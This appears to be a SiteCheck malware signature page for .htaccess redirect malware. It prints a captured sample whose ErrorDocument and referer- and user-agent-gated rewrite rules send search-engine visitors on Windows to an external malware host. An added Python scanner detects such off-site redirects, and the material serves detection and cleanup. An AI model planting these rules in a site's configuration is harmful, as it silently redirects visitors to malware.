SiteCheck Signatures


malware-entry-mwhta3

Description:

This attack uses .htaccess to redirect users to a site serving malware (or spam).

Loads malware from:

http://blog.natebennettfleming.com/main.php
And other domains.

Affecting:

Any type of web site (no specific target).

Clean up and details:

Remove the offending code from .htaccess.

Links:
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html

Malware sample:

ErrorDocument 500 http://blog.natebennettfleming.com/main.php?i=Jc2tgtAbrvymixjzUMtFypEZ&e=0
ErrorDocument 502 http://blog.natebennettfleming.com/main.php?i=Jc2tgtAbrvymixjzUMtFypEZ&e=2

RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
..
RewriteCond %{HTTP_REFERER} .hotbot.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .goto.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .infoseek.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .mamma.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .alltheweb.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .lycos.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .search.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .metacrawler.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .mail.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .dogpile.$ [NC]

RewriteCond %{HTTP_USER_AGENT} .Windows.
RewriteRule .* http://blog.natebennettfleming.com/main.php?h=%{HTTP_HOST}&i=Jc2tgtAbrvymixjzUMtFypEZ&e=r [R,L]
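
A check for the pattern in this signature, added here as an example (not SiteCheck's own detection code): it flags ErrorDocument targets and referer- or user-agent-gated RewriteRule redirects that point at a host outside the site's own. The function names, the own_hosts parameter and the sample input with its placeholder host redirector.invalid are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed .htaccess sample; redirector.invalid is a placeholder host.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\\.org$ [NC]
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]
ErrorDocument 404 /errors/404.html
ErrorDocument 500 http://redirector.invalid/main.php?e=0
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://redirector.invalid/main.php?h=%{HTTP_HOST}&e=r [R,L]
"""

def external_host(target, own_hosts):
    """Return the host if target is an absolute URL outside own_hosts, else None."""
    if not re.match(r"https?://", target, re.I):
        return None  # local path or quoted message text
    host = (urlsplit(target).hostname or "").lower()
    return None if host in own_hosts else host

def scan_htaccess(text, own_hosts):
    """Return (line_no, kind, host) for directives that send visitors off-site."""
    own = {h.lower() for h in own_hosts}
    findings, conds = [], []
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        name = parts[0].lower()
        if name == "errordocument" and len(parts) >= 3:
            host = external_host(parts[2], own)
            if host:
                findings.append((no, "errordocument-external", host))
        elif name == "rewritecond" and len(parts) >= 2:
            conds.append(parts[1].upper())
        elif name == "rewriterule" and len(parts) >= 3:
            host = external_host(parts[2], own)
            gated = any(re.search(r"HTTP_(REFERER|USER_AGENT)", c) for c in conds)
            if host and gated:
                findings.append((no, "conditional-redirect", host))
            conds = []  # RewriteCond lines apply only to the next RewriteRule
    return findings

if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE, {"example.org", "www.example.org"}):
        print(finding)
```

A hit is a lead for manual review of the file, since a site may have legitimate off-site redirects of its own.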